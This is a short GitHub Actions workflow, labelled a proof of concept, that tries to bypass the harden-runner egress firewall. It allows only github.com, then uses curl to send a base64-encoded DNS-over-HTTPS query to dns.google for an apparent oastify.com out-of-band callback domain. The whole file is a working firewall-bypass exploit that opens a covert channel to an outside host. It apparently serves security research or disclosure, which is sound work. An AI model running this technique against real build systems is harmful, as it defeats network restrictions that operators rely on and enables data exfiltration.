name: PoC 
on: [push, workflow_dispatch]
jobs:
  bypass-firewall:
    runs-on: ubuntu-latest
    steps:


      - uses: step-security/harden-runner@c6295a65d1254861815972266d5933fd6e532bdf
        with:
          egress-policy: block
          disable-sudo: true
          allowed-endpoints: >
            github.com:443


      - name: Test bypass
        run: |
          curl -H 'accept: application/dns-message' 'https://dns.google/dns-query?dns=eHFycTIyMW4yZmZpamxjMWxxaTNpdTR2b211ZGliNjAub2FzdGlmeS5jb20='  | hexdump -c

